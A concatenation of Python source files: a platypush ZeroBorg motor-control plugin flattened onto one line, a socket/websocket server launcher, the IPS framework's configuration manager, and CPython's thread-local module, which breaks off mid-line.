import enum import logging import threading import time from platypush.message.response import Response from platypush.plugins import Plugin from platypush.context import get_plugin from platypush.config import Config class Direction(enum.Enum): DIR_UP = 'up' DIR_DOWN = 'down' DIR_LEFT = 'left' DIR_RIGHT = 'right' DIR_AUTO = 'auto' DIR_AUTO_TOGGLE = 'auto_toggle' class GpioZeroborgPlugin(Plugin): _drive_thread = None _can_run = False _direction = None def __init__(self, directions = {}): import platypush.plugins.gpio.zeroborg.lib as ZeroBorg self.directions = directions self.auto_mode = False self._direction = None self.zb = ZeroBorg.ZeroBorg() self.zb.Init() self.zb.SetCommsFailsafe(True) self.zb.ResetEpo() def _get_measurement(self, plugin, timeout): measure_start_time = time.time() value = None while value is None: value = plugin.get_measurement() if time.time() - measure_start_time > timeout: return None return value def _get_direction_from_sensors(self): if Direction.DIR_AUTO.value not in self.directions: raise RuntimeError("Can't start auto pilot: " + "no sensor configured in gpio.zeroborg.directions.auto") direction = None for sensor in self.directions[Direction.DIR_AUTO.value]['sensors']: plugin = get_plugin(sensor['plugin']) if not sensor: raise RuntimeError('No such sensor: ' + sensor['plugin']) value = self._get_measurement(plugin=plugin, timeout=sensor['timeout']) threshold = sensor['threshold'] if value >= threshold and 'above_threshold_direction' in sensor: direction = sensor['above_threshold_direction'] elif 'below_threshold_direction' in sensor: direction = sensor['below_threshold_direction'] logging.info('Sensor: {}\tMeasurement: {}\tDirection: {}' .format(sensor['plugin'], value, direction)) return direction def drive(self, direction): prev_direction = self._direction self._can_run = True self._direction = direction.lower() logging.info('Received ZeroBorg drive command: {}'.format(direction)) def _run(): while self._can_run and self._direction: left = 0.0 right = 0.0 if self._direction == Direction.DIR_AUTO_TOGGLE.value: if self.auto_mode: self._direction = None self.auto_mode = False else: self._direction = Direction.DIR_AUTO self.auto_mode = True if self._direction == Direction.DIR_AUTO.value: self.auto_mode = True if self.auto_mode: self._direction = self._get_direction_from_sensors() time.sleep(0.1) motor_1_power = motor_2_power = motor_3_power = motor_4_power = 0.0 if self._direction in self.directions: motor_1_power = self.directions[self._direction]['motor_1_power'] motor_2_power = self.directions[self._direction]['motor_2_power'] motor_3_power = self.directions[self._direction]['motor_3_power'] motor_4_power = self.directions[self._direction]['motor_4_power'] elif self._direction: logging.warning('Invalid direction {}, stopping motors'.format(self._direction)) self.zb.SetMotor1(motor_1_power) self.zb.SetMotor2(motor_2_power) self.zb.SetMotor3(motor_3_power) self.zb.SetMotor4(motor_4_power) self.auto_mode = False self._drive_thread = threading.Thread(target=_run) self._drive_thread.start() return Response(output={'status': 'running', 'direction': direction}) def stop(self): self._can_run = False if self._drive_thread and threading.get_ident() != self._drive_thread.ident: self._drive_thread.join() self.zb.MotorsOff() self.zb.ResetEpo() return Response(output={'status':'stopped'}) # vim:sw=4:ts=4:et:
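# A hedged sketch of the `directions` mapping the plugin above expects but never
# documents: each direction maps to the four motor power values read in drive(),
# and the 'auto' entry carries the sensor list read by
# _get_direction_from_sensors().  The power values, threshold and sensor plugin
# name below are illustrative assumptions, not taken from a real configuration.
example_directions = {
    'up': {'motor_1_power': 1.0, 'motor_2_power': 1.0,
           'motor_3_power': -1.0, 'motor_4_power': -1.0},
    'down': {'motor_1_power': -1.0, 'motor_2_power': -1.0,
             'motor_3_power': 1.0, 'motor_4_power': 1.0},
    'auto': {
        'sensors': [
            {
                'plugin': 'gpio.sensor.distance',   # assumed plugin name
                'timeout': 2.0,                     # seconds to wait for a reading
                'threshold': 400.0,
                'above_threshold_direction': 'up',
                'below_threshold_direction': 'left',
            },
        ],
    },
}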
main.py
import multiprocessing

from db import DbBridge
from comunications import SocketServer, WebsocketServer

if __name__ == "__main__":
    db = DbBridge()
    db.initDB()

    connectionsClients = {}
    socket = SocketServer(connectionsClients)
    websocket = WebsocketServer(connectionsClients)

    try:
        # create one worker process per server
        socketProcess = multiprocessing.Process(target=socket.run, args=())
        websocketProcess = multiprocessing.Process(
            target=websocket.run, args=())
        # the bridge is no longer needed in the parent process
        db.close()

        # start both workers
        socketProcess.start()
        websocketProcess.start()

        # wait until both workers have finished
        socketProcess.join()
        websocketProcess.join()
    except KeyboardInterrupt:
        socket.stop()
        # also make sure both worker processes are shut down before exiting
        for process in (socketProcess, websocketProcess):
            if process.is_alive():
                process.terminate()
            process.join()
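# A hedged aside on the shared dict above: once start() is called, each worker
# process operates on its own copy of the plain `connectionsClients` dict, so
# updates made by SocketServer are not visible to WebsocketServer.  If the two
# servers are meant to share that mapping, a Manager-backed dict is one option.
# Minimal sketch, assuming both servers only use ordinary item access:
def make_shared_clients():
    manager = multiprocessing.Manager()
    # keep the manager alive for as long as the proxy dict is in use
    return manager, manager.dict()

# usage (illustrative):
#   manager, connectionsClients = make_shared_clients()
#   socket = SocketServer(connectionsClients)
#   websocket = WebsocketServer(connectionsClients)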
configurationManager.py
# ------------------------------------------------------------------------------- # Copyright 2006-2021 UT-Battelle, LLC. See LICENSE for more information. # ------------------------------------------------------------------------------- import os import sys import importlib import importlib.util import tempfile import uuid import logging import socket from multiprocessing import Queue, Process, set_start_method from .configobj import ConfigObj from . import ipsLogging from .services import ServicesProxy from .componentRegistry import ComponentID, ComponentRegistry # Try using fork for starting subprocesses, this is the default on # Linux but not macOS with python >= 3.8 if sys.platform == 'darwin': try: set_start_method('fork') except RuntimeError: # context can only be set once pass class ConfigurationManager: """ The configuration manager is responsible for paring the simulation and platform configuration files, creating the framework and simulation components, as well as providing an interface to accessing items from the configuration files (e.g., the time loop). """ # CM init class SimulationData: """ Structure to hold simulation data stored into the sim_map entry in the configurationManager class """ def __init__(self, sim_name): self.sim_name = sim_name self.portal_sim_name = None self.sim_root = None self.sim_conf = None self.config_file = None self.conf_file_dir = None self.driver_comp = None self.init_comp = None self.all_comps = [] self.port_map = {} self.component_process = None self.process_list = [] def __init__(self, fwk, config_file_list, platform_file_name): """ Initialize the values to be used by the configuration manager. Also specified are the required fields of the simulation configuration file, and the configuration files are read in. """ # ref to framework self.fwk = fwk self.event_mgr = None self.data_mgr = None self.resource_mgr = None self.task_mgr = None self.comp_registry = ComponentRegistry() # SIMYAN: here is where we removed the requirement for BIN_PATH, etc. # from the required fields. This was done so that we could specify it # in the component-generic.conf file, which allows you to point to a # directory that contains physics and other binaries on a global level # i.e. 
removing the requirement that it be specified for each component self.required_fields = set(['CLASS', 'SUB_CLASS', 'NAME', 'SCRIPT', 'INPUT_FILES', 'OUTPUT_FILES', 'NPROC']) self.config_file_list = [] self.sim_name_list = None self.sim_root_list = None self.log_file_list = None self.log_dynamic_sim_queue = Queue(0) class Unbuffered: def __init__(self, stream): self.stream = stream def write(self, data): self.stream.write(data) self.stream.flush() def writelines(self, data): self.stream.writelines(data) self.stream.flush() def __getattr__(self, attr): return getattr(self.stream, attr) for conf_file in config_file_list: abs_path = os.path.abspath(conf_file) if abs_path not in self.config_file_list: self.config_file_list.append(abs_path) else: print('Ignoring duplicate configuration file ', abs_path) # sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) sys.stdout = Unbuffered(sys.stdout) self.platform_file = os.path.abspath(platform_file_name) self.platform_conf = {} loc_keys = [] mach_keys = ['MPIRUN', 'NODE_DETECTION', 'CORES_PER_NODE', 'SOCKETS_PER_NODE', 'NODE_ALLOCATION_MODE'] prov_keys = ['HOST'] self.platform_keywords = loc_keys + mach_keys + prov_keys self.service_methods = ['get_port', 'get_config_parameter', 'set_config_parameter', 'get_time_loop', 'create_simulation'] self.fwk.register_service_handler(self.service_methods, getattr(self, 'process_service_request')) self.sim_map = {} self.finished_sim_map = {} self.fwk_sim_name = None # "Fake" simconf for framework components self.fwk_components = [] # List of framework specific components self.myTopic = None self.log_daemon = ipsLogging.ipsLogger(self.log_dynamic_sim_queue) self.log_process = None # CM initialize def initialize(self, data_mgr, resource_mgr, task_mgr): """ Parse the platform and simulation configuration files using the :py:obj:`ConfigObj` module. Create and initialize simulation(s) and their components, framework components and loggers. """ self.event_mgr = None # eventManager(self) self.data_mgr = data_mgr self.resource_mgr = resource_mgr self.task_mgr = task_mgr # Parse configuration files into configuration map sim_root_list = self.sim_root_list = [] sim_name_list = self.sim_name_list = [] log_file_list = self.log_file_list = [] # Idiot checks if len(self.config_file_list) == 0: self.fwk.exception('Missing config file? Something is very wrong') raise ValueError('Missing config file? 
Something is very wrong') """ Platform Configuration """ # parse file try: self.platform_conf = ConfigObj(self.platform_file, interpolation='template', file_error=True) except (IOError, SyntaxError): self.fwk.exception('Error opening config file: %s', self.platform_file) raise # get mandatory values for kw in self.platform_keywords: try: self.platform_conf[kw] except KeyError: self.fwk.exception('Missing required parameter %s in platform config file', kw) raise # Make sure the HOST variable is defined try: host = self.platform_conf['HOST'] except KeyError: self.platform_conf['HOST'] = socket.gethostname() else: if not host: self.platform_conf['HOST'] = socket.gethostname() """ optional platform values are obtained and read here """ user = '' try: user = self.platform_conf['USER'] except KeyError: try: user = os.environ['USER'] except Exception: pass self.platform_conf['USER'] = user # Grab environment variables plat_keys = list(self.platform_conf.keys()) for (k, v) in os.environ.items(): if k not in plat_keys \ and not any(x in v for x in '{}()$'): self.platform_conf[k] = v mpirun_version = self.platform_conf.get('MPIRUN_VERSION', 'OpenMPI-generic') # node allocation mode describes how node allocation should be handled # in the IPS. # EXCLUSIVE - only one application can run on a single node. # SHARE - applications may share nodes. try: node_alloc_mode = self.platform_conf['NODE_ALLOCATION_MODE'].upper() if node_alloc_mode not in ['EXCLUSIVE', 'SHARED']: self.fwk.exception("bad value for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") raise ValueError("bad value for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") except Exception: self.fwk.exception("missing value or bad type for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") raise uan_val = self.platform_conf.get('USE_ACCURATE_NODES', 'ON').upper() if uan_val in ['OFF', 'FALSE']: use_accurate_nodes = False else: use_accurate_nodes = True self.platform_conf['TOTAL_PROCS'] = int(self.platform_conf.get('TOTAL_PROCS', 0)) self.platform_conf['NODES'] = int(self.platform_conf.get('NODES', 0)) self.platform_conf['PROCS_PER_NODE'] = int(self.platform_conf.get('PROCS_PER_NODE', 0)) self.platform_conf['CORES_PER_NODE'] = int(self.platform_conf.get('CORES_PER_NODE', 0)) self.platform_conf['SOCKETS_PER_NODE'] = int(self.platform_conf.get('SOCKETS_PER_NODE', 0)) self.platform_conf['USE_ACCURATE_NODES'] = use_accurate_nodes self.platform_conf['MPIRUN_VERSION'] = mpirun_version """ Simulation Configuration """ for conf_file in self.config_file_list: try: conf = ConfigObj(conf_file, interpolation='template', file_error=True) # Import environment variables into config file # giving precedence to config file definitions in case of duplicates conf_keys = list(conf.keys()) for (k, v) in os.environ.items(): if k not in conf_keys and not any(x in v for x in '{}()$'): conf[k] = v # Allow simulation file to override platform values # and then put all platform values into simulation map for key in self.platform_conf: if key in conf_keys and key not in os.environ.keys(): self.platform_conf[key] = conf[key] if key not in conf_keys: conf[key] = self.platform_conf[key] # Override platform value for PORTAL_URL if in simulation if 'PORTAL_URL' in conf_keys: self.platform_conf['PORTAL_URL'] = conf['PORTAL_URL'] except (IOError, SyntaxError): self.fwk.exception('Error opening config file %s: ', conf_file) raise except Exception: self.fwk.exception('Error(s) during parsing of supplied config file %s: ', conf_file) raise try: sim_name = 
conf['SIM_NAME'] sim_root = conf['SIM_ROOT'] log_file = os.path.abspath(conf['LOG_FILE']) except KeyError: self.fwk.exception('Missing required parameters SIM_NAME, SIM_ROOT or LOG_FILE\ in configuration file %s', conf_file) raise if sim_name in sim_name_list: self.fwk.exception('Error: Duplicate SIM_NAME in configuration files') sys.exit(1) if sim_root in sim_root_list: self.fwk.exception('Error: Duplicate SIM_ROOT in configuration files') sys.exit(1) if log_file in log_file_list: self.fwk.exception('Error: Duplicate LOG_FILE in configuration files') sys.exit(1) if 'SIMULATION_CONFIG_FILE' not in conf: conf['SIMULATION_CONFIG_FILE'] = conf_file sim_name_list.append(sim_name) sim_root_list.append(sim_root) log_file_list.append(log_file) new_sim = self.SimulationData(sim_name) conf['__PORTAL_SIM_NAME'] = sim_name new_sim.sim_conf = conf new_sim.config_file = conf_file new_sim.portal_sim_name = sim_name # SIMYAN: store the directory of the configuration file new_sim.conf_file_dir = os.path.dirname(os.path.abspath(conf_file)) new_sim.sim_root = sim_root new_sim.log_file = log_file new_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' self.log_daemon.add_sim_log(new_sim.log_pipe_name, new_sim.log_file) self.sim_map[sim_name] = new_sim # Use first simulation for framework components if not self.fwk_sim_name: fwk_sim_conf = conf.dict() fwk_sim_conf['SIM_NAME'] = '_'.join([conf['SIM_NAME'], 'FWK']) fwk_sim = self.SimulationData(fwk_sim_conf['SIM_NAME']) fwk_sim.sim_conf = fwk_sim_conf fwk_sim.sim_root = new_sim.sim_root fwk_sim.log_file = self.fwk.log_file # sys.stdout fwk_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' fwk_sim_conf['LOG_LEVEL'] = 'DEBUG' self.log_daemon.add_sim_log(fwk_sim.log_pipe_name, fwk_sim.log_file) self.fwk_sim_name = fwk_sim_conf['SIM_NAME'] self.sim_map[fwk_sim.sim_name] = fwk_sim self.log_process = Process(target=self.log_daemon.__run__) self.log_process.start() for sim_name, sim_data in self.sim_map.items(): if sim_name != self.fwk_sim_name: self._initialize_sim(sim_data) # ***** commenting out portal stuff for now self._initialize_fwk_components() # do later - subscribe to events, set up event publishing structure # publish "CM initialized" event def _initialize_fwk_components(self): """ Initialize 'components' that are part of the framework infrastructure. 
Those components (for now) communicate using the event bus and are not part of the normal framework-mediated RPC inter-compponent interactions """ # SIMYAN: set up the runspaceInit component runspace_conf = {} runspace_conf['CLASS'] = 'FWK' runspace_conf['SUB_CLASS'] = 'COMP' runspace_conf['NAME'] = 'runspaceInitComponent' runspace_conf['SCRIPT'] = '' runspace_conf['MODULE'] = 'ipsframework.runspaceInitComponent' runspace_conf['INPUT_DIR'] = '/dev/null' runspace_conf['INPUT_FILES'] = '' runspace_conf['IPS_CONFFILE_DIR'] = '' runspace_conf['DATA_FILES'] = '' runspace_conf['OUTPUT_FILES'] = '' runspace_conf['NPROC'] = 1 runspace_conf['LOG_LEVEL'] = 'WARNING' runspace_conf['OS_CWD'] = os.getcwd() if self.fwk.log_level == logging.DEBUG: runspace_conf['LOG_LEVEL'] = 'DEBUG' runspace_component_id = self._create_component(runspace_conf, self.sim_map[self.fwk_sim_name]) self.fwk_components.append(runspace_component_id) # SIMYAN: set up The Portal bridge, allowing for an absence of a portal use_portal = True if 'USE_PORTAL' in self.sim_map[self.fwk_sim_name].sim_conf: use_portal = self.sim_map[self.fwk_sim_name].sim_conf['USE_PORTAL'] if use_portal.lower() == "false": use_portal = False if use_portal: portal_conf = {} portal_conf['CLASS'] = 'FWK' portal_conf['SUB_CLASS'] = 'COMP' portal_conf['NAME'] = 'PortalBridge' if 'FWK_COMPS_PATH' in self.sim_map[self.fwk_sim_name].sim_conf: portal_conf['BIN_PATH'] = self.sim_map[self.fwk_sim_name].sim_conf['FWK_COMPS_PATH'] portal_conf['SCRIPT'] = os.path.join(portal_conf['BIN_PATH'], 'portalBridge.py') else: portal_conf['SCRIPT'] = '' portal_conf['MODULE'] = 'ipsframework.portalBridge' portal_conf['INPUT_DIR'] = '/dev/null' portal_conf['INPUT_FILES'] = '' portal_conf['DATA_FILES'] = '' portal_conf['OUTPUT_FILES'] = '' portal_conf['NPROC'] = 1 portal_conf['LOG_LEVEL'] = 'WARNING' try: portal_conf['USER'] = self.sim_map[self.fwk_sim_name].sim_conf['USER'] except KeyError: portal_conf['USER'] = self.platform_conf['USER'] if self.fwk.log_level == logging.DEBUG: portal_conf['LOG_LEVEL'] = 'DEBUG' portal_conf['PORTAL_URL'] = self.get_platform_parameter('PORTAL_URL', silent=True) component_id = self._create_component(portal_conf, self.sim_map[self.fwk_sim_name]) self.fwk_components.append(component_id) def _initialize_sim(self, sim_data): """ Parses the configuration data (*sim_conf*) associated with a simulation (*sim_name*). Instantiate the components associated with each simulation. Populate the *component_registry* with appropriate component and port mapping info. 
""" sim_conf = sim_data.sim_conf sim_name = sim_data.sim_name ports_config = sim_conf['PORTS'] ports_list = ports_config['NAMES'].split() # simRootDir = self.get_sim_parameter(sim_name, 'SIM_ROOT') # SIMYAN: removed code that would make the simrootDir from here and # moved it to the runspaceInit component # set simulation level partial_nodes try: pn_simconf = sim_conf['NODE_ALLOCATION_MODE'] if pn_simconf.upper() == 'SHARED': sim_data.sim_conf['NODE_ALLOCATION_MODE'] = 'SHARED' elif pn_simconf.upper() == 'EXCLUSIVE': sim_data.sim_conf['NODE_ALLOCATION_MODE'] = 'EXCLUSIVE' else: self.fwk.exception("Bad 'NODE_ALLOCATION_MODE' value %s" % pn_simconf) raise Exception("Bad 'NODE_ALLOCATION_MODE' value %s" % pn_simconf) except Exception: sim_data.sim_conf['NODE_ALLOCATION_MODE'] = self.platform_conf['NODE_ALLOCATION_MODE'] for port in ports_list: try: comp_ref = ports_config[port]['IMPLEMENTATION'] if comp_ref.strip() == '': continue comp_conf = sim_conf[comp_ref] except Exception: self.fwk.exception('Error accessing configuration section for ' + 'component %s in simulation %s', comp_ref, sim_name) sys.exit(1) conf_fields = set(comp_conf.keys()) # Move the paths to the component levels so that they can use it # If they already have it, then they are effectively overriding the global values if 'INPUT_DIR' not in comp_conf: if 'INPUT_DIR' in sim_conf: comp_conf['INPUT_DIR'] = sim_conf['INPUT_DIR'] else: comp_conf['INPUT_DIR'] = sim_data.conf_file_dir if 'IPS_ROOT' not in comp_conf: if 'IPS_ROOT' in sim_conf: comp_conf['IPS_ROOT'] = sim_conf['IPS_ROOT'] if 'DATA_TREE_ROOT' not in comp_conf: if 'DATA_TREE_ROOT' in sim_conf: comp_conf['DATA_TREE_ROOT'] = sim_conf['DATA_TREE_ROOT'] else: comp_conf['DATA_TREE_ROOT'] = sim_data.conf_file_dir if 'BIN_DIR' not in comp_conf: if 'BIN_DIR' in sim_conf: comp_conf['BIN_DIR'] = sim_conf['BIN_DIR'] if 'BIN_PATH' not in comp_conf: if 'BIN_PATH' in sim_conf: comp_conf['BIN_PATH'] = sim_conf['BIN_PATH'] else: comp_conf['BIN_PATH'] = comp_conf['BIN_DIR'] if not self.required_fields.issubset(conf_fields): msg = 'Error: missing required entries {} in simulation {} component {} configuration section'.format( list(self.required_fields - conf_fields), sim_name, comp_ref) self.fwk.critical(msg) raise RuntimeError(msg) component_id = self._create_component(comp_conf, sim_data) sim_data.port_map[port] = component_id if port == 'DRIVER': sim_data.driver_comp = component_id elif port == 'INIT': sim_data.init_comp = component_id if sim_data.driver_comp is None: msg = 'Missing DRIVER specification in config file for simulation {}'.format(sim_data.sim_name) self.fwk.critical(msg) raise RuntimeError(msg) if sim_data.init_comp is None: self.fwk.warning('Missing INIT specification in ' + 'config file for simulation %s', sim_data.sim_name) def _create_component(self, comp_conf, sim_data): """ Create component and populate it with the information from the component's configuration section. 
""" sim_name = sim_data.sim_name class_name = comp_conf['NAME'] if comp_conf['SCRIPT']: try: fullpath = os.path.abspath(comp_conf['SCRIPT']) script = comp_conf['SCRIPT'].rsplit('.', 1)[0].split('/')[-1] spec = importlib.util.spec_from_file_location(script, fullpath) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) component_class = getattr(module, class_name) except (FileNotFoundError, AttributeError): self.fwk.error('Error in configuration file : NAME = %s SCRIPT = %s', comp_conf['NAME'], comp_conf['SCRIPT']) self.fwk.exception('Error instantiating IPS component %s From %s', class_name, script) raise else: try: module = importlib.import_module(comp_conf['MODULE']) component_class = getattr(module, class_name) except (ModuleNotFoundError, AttributeError): raise # SIMYAN: removed else conditional, copying files in runspaceInit # component now svc_response_q = Queue(0) invocation_q = Queue(0) component_id = ComponentID(class_name, sim_name) fwk_inq = self.fwk.get_inq() log_pipe_name = sim_data.log_pipe_name services_proxy = ServicesProxy(self.fwk, fwk_inq, svc_response_q, sim_data.sim_conf, log_pipe_name) new_component = component_class(services_proxy, comp_conf) new_component.__initialize__(component_id, invocation_q, self.fwk.start_time) services_proxy.__initialize__(new_component) self.comp_registry.addEntry(component_id, svc_response_q, invocation_q, new_component, services_proxy, comp_conf) p = Process(target=new_component.__run__) p.start() sim_data.process_list.append(p) sim_data.all_comps.append(component_id) return component_id def get_component_map(self): """ Return a dictionary of simulation names and lists of component references. (May only be the driver, and init (if present)???) """ sim_comps = {} for sim_name in self.sim_map: if sim_name == self.fwk_sim_name: continue sim_comps[sim_name] = self.get_simulation_components(sim_name) return sim_comps def get_simulation_components(self, sim_name): comp_list = [] sim_data = self.sim_map[sim_name] if sim_data.init_comp: comp_list.append(sim_data.init_comp) comp_list.append(sim_data.driver_comp) return comp_list def get_all_simulation_components_map(self): sim_comps = {name: sim_map.all_comps[:] for name, sim_map in self.sim_map.items()} del sim_comps[self.fwk_sim_name] return sim_comps def get_framework_components(self): """ Return list of framework components. """ fwk_components = self.fwk_components[:] return fwk_components def get_sim_parameter(self, sim_name, param): """ Return value of *param* from simulation configuration file for *sim_name*. """ try: sim_data = self.sim_map[sim_name] except KeyError: sim_data = self.finished_sim_map[sim_name] try: val = sim_data.sim_conf[param] except KeyError: val = self.platform_conf[param] self.fwk.debug('Returning value = %s for config parameter %s in simulation %s', val, param, sim_name) return val def get_sim_names(self): """ Return list of names of simulations. """ return list(self.sim_map.keys()) def process_service_request(self, msg): """ Invokes public configuration manager method for a component. Return method's return value. 
""" self.fwk.debug('Configuration Manager received message: %s', str(msg.__dict__)) sim_name = msg.sender_id.get_sim_name() method = getattr(self, msg.target_method) self.fwk.debug('Configuration manager dispatching method %s on simulation %s', method, sim_name) retval = method(sim_name, *msg.args) return retval def create_simulation(self, sim_name, config_file, override, sub_workflow=False): try: conf = ConfigObj(config_file, interpolation='template', file_error=True) except IOError: self.fwk.exception('Error opening config file %s: ', config_file) raise except SyntaxError: self.fwk.exception(' Error parsing config file %s: ', config_file) raise parent_sim_name = sim_name parent_sim = self.sim_map[parent_sim_name] # Incorporate environment variables into config file # Use config file entries when duplicates are detected conf_keys = list(conf.keys()) for (k, v) in os.environ.items(): # Do not include functions from environment if k not in conf_keys and \ not any(x in v for x in '{}()$'): conf[k] = v # Allow propagation of entries from platform config file to simulation # config file for keyword in list(self.platform_conf.keys()): if keyword not in list(conf.keys()): conf[keyword] = self.platform_conf[keyword] if override: for kw in list(override.keys()): conf[kw] = override[kw] try: sim_name = conf['SIM_NAME'] sim_root = conf['SIM_ROOT'] log_file = os.path.abspath(conf['LOG_FILE']) except KeyError: self.fwk.exception('Missing required parameters SIM_NAME, SIM_ROOT or LOG_FILE\ in configuration file %s', config_file) raise if sim_name in self.sim_name_list: self.fwk.error('Error: Duplicate SIM_NAME %s in configuration files' % (sim_name)) raise Exception('Duplicate SIM_NAME %s in configuration files' % (sim_name)) if sim_root in self.sim_root_list: self.fwk.exception('Error: Duplicate SIM_ROOT in configuration files') raise Exception('Duplicate SIM_ROOT in configuration files') if log_file in self.log_file_list: self.fwk.exception('Error: Duplicate LOG_FILE in configuration files') raise Exception('Duplicate LOG_FILE in configuration files') # Add path to configuration file to simulation configuration in memory if 'SIMULATION_CONFIG_FILE' not in conf: conf['SIMULATION_CONFIG_FILE'] = config_file self.sim_name_list.append(sim_name) self.sim_root_list.append(sim_root) self.log_file_list.append(log_file) new_sim = self.SimulationData(sim_name) new_sim.sim_conf = conf new_sim.config_file = config_file new_sim.sim_root = sim_root new_sim.log_file = log_file if not sub_workflow: new_sim.portal_sim_name = sim_name new_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' self.log_dynamic_sim_queue.put('CREATE_SIM %s %s' % (new_sim.log_pipe_name, new_sim.log_file)) else: new_sim.portal_sim_name = parent_sim.portal_sim_name new_sim.log_pipe_name = parent_sim.log_pipe_name conf['__PORTAL_SIM_NAME'] = new_sim.portal_sim_name self.sim_map[sim_name] = new_sim self._initialize_sim(new_sim) if not sub_workflow: self.fwk.initiate_new_simulation(sim_name) return (sim_name, new_sim.init_comp, new_sim.driver_comp) def get_port(self, sim_name, port_name): """ Return a reference to the component from simulation *sim_name* implementing port *port_name*. """ sim_data = self.sim_map[sim_name] comp_id = sim_data.port_map[port_name] return comp_id def get_config_parameter(self, sim_name, param): """ Return value of *param* from simulation configuration file for *sim_name*. 
""" return self.get_sim_parameter(sim_name, param) def set_config_parameter(self, sim_name, param, value, target_sim_name): """ Set the configuration parameter *param* to value *value* in *target_sim_name*. If *target_sim_name* is the framework, all simulations will get the change. Return *value*. """ if target_sim_name == self.fwk_sim_name: # apply to all simulations target_sims = list(self.sim_map.keys()) else: target_sims = [target_sim_name] for other_sim_name in target_sims: self.fwk.debug('Setting %s to %s in simulation %s', param, value, other_sim_name) try: sim_data = self.sim_map[other_sim_name] except KeyError: sim_data = self.finished_sim_map[other_sim_name] self.fwk.debug('Setting %s to %s in simulation %s', param, value, other_sim_name) sim_conf = sim_data.sim_conf sim_conf[param] = value return value def get_platform_parameter(self, param, silent=False): """ Return value of platform parameter *param*. If *silent* is ``False`` (default) ``None`` is returned when *param* not found, otherwise an exception is raised. """ val = None try: val = self.platform_conf[param] except KeyError: if not silent: self.fwk.warning('CM: No platform data for %s ', param) raise return val def terminate_sim(self, sim_name): sim_data = self.sim_map[sim_name] all_sim_components = sim_data.all_comps msg = 'END_SIM %s' % (sim_data.log_pipe_name) self.log_dynamic_sim_queue.put(msg) proc_list = sim_data.process_list for p in proc_list: p.terminate() p.join() try: os.remove(sim_data.log_pipe_name) except Exception: pass for comp_id in all_sim_components: self.comp_registry.removeEntry(comp_id) sim_data.logger = None sim_data.process_list = [] self.finished_sim_map[sim_name] = sim_data del self.sim_map[sim_name] def terminate(self, status): """ Terminates all processes attached to the framework. *status* not used. """ try: for sim_name in list(self.sim_map.keys()): self.terminate_sim(sim_name) except Exception: print('Encountered exception when terminating simulation') raise for k in list(self.sim_map.keys()): del self.sim_map[k] self.log_process.terminate()
_threading_local.py
"""Thread-local objects. (Note that this module provides a Python version of the threading.local class. Depending on the version of Python you're using, there may be a faster one available. You should always import the `local` class from `threading`.) Thread-local objects support the management of thread-local data. If you have data that you want to be local to a thread, simply create a thread-local object and use its attributes: >>> mydata = local() >>> mydata.number = 42 >>> mydata.number 42 You can also access the local-object's dictionary: >>> mydata.__dict__ {'number': 42} >>> mydata.__dict__.setdefault('widgets', []) [] >>> mydata.widgets [] What's important about thread-local objects is that their data are local to a thread. If we access the data in a different thread: >>> log = [] >>> def f(): ... items = sorted(mydata.__dict__.items()) ... log.append(items) ... mydata.number = 11 ... log.append(mydata.number) >>> import threading >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() >>> log [[], 11] we get different data. Furthermore, changes made in the other thread don't affect data seen in this thread: >>> mydata.number 42 Of course, values you get from a local object, including a __dict__ attribute, are for whatever thread was current at the time the attribute was read. For that reason, you generally don't want to save these values across threads, as they apply only to the thread they came from. You can create custom local objects by subclassing the local class: >>> class MyLocal(local): ... number = 2 ... initialized = False ... def __init__(self, **kw): ... if self.initialized: ... raise SystemError('__init__ called too many times') ... self.initialized = True ... self.__dict__.update(kw) ... def squared(self): ... return self.number ** 2 This can be useful to support default values, methods and initialization. Note that if you define an __init__ method, it will be called each time the local object is used in a separate thread. This is necessary to initialize each thread's dictionary. Now if we create a local object: >>> mydata = MyLocal(color='red') Now we have a default number: >>> mydata.number 2 an initial color: >>> mydata.color 'red' >>> del mydata.color And a method that operates on the data: >>> mydata.squared() 4 As before, we can access the data in a separate thread: >>> log = [] >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() >>> log [[('color', 'red'), ('initialized', True)], 11] without affecting this thread's data: >>> mydata.number 2 >>> mydata.color Traceback (most recent call last): ... AttributeError: 'MyLocal' object has no attribute 'color' Note that subclasses can define slots, but they are not thread local. They are shared across threads: >>> class MyLocal(local): ... __slots__ = 'number' >>> mydata = MyLocal() >>> mydata.number = 42 >>> mydata.color = 'red' So, the separate thread: >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() affects what we see: >>> mydata.number 11 >>> del mydata """ from weakref import ref from contextlib import contextmanager __all__ = ["local"] # We need to use objects from the threading module, but the threading # module may also want to use our `local` class, if support for locals # isn't compiled in to the `thread` module. This creates potential problems # with circular imports. For that reason, we don't import `threading` # until the bottom of this file (a hack sufficient to worm around the # potential problems). 
Note that all platforms on CPython do have support # for locals in the `thread` module, and there is no circular import problem # then, so problems introduced by fiddling the order of imports here won't # manifest. class _localimpl: """A class managing thread-local dicts""" __slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__' def __init__(self): # The key used in the Thread objects' attribute dicts. # We keep it a string for speed but make it unlikely to clash with # a "real" attribute. self.key = '_threading_local._localimpl.' + str(id(self)) # { id(Thread) -> (ref(Thread), thread-local dict) } self.dicts = {} def get_dict(self): """Return the dict for the current thread. Raises KeyError if none defined.""" thread = current_thread() return self.dicts[id(thread)][1] def create_dict(self): """Create a new dict for the current thread, and return it.""" localdict = {} key = self.key thread = current_thread() idt = id(thread) def local_deleted(_, key=key): # When the localimpl is deleted, remove the thread attribute. thread = wrthread() if thread is not None: del thread.__dict__[key] def thread_deleted(_, idt=idt): # When the thread is deleted, remove the local dict. # Note that this is suboptimal if the thread object gets # caught in a reference loop. We would like to be called # as soon as the OS-level thread ends instead. local = wrlocal() if local is not None: dct = local.dicts.pop(idt) wrlocal = ref(self, local_deleted) wrthread = ref(thread, thread_deleted) thread.__dict__[key] = wrlocal self.dicts[idt] = wrthread, localdict return localdict @contextmanager def _patch(self): impl = object.__getattribute__(self, '_local__impl') try: dct = 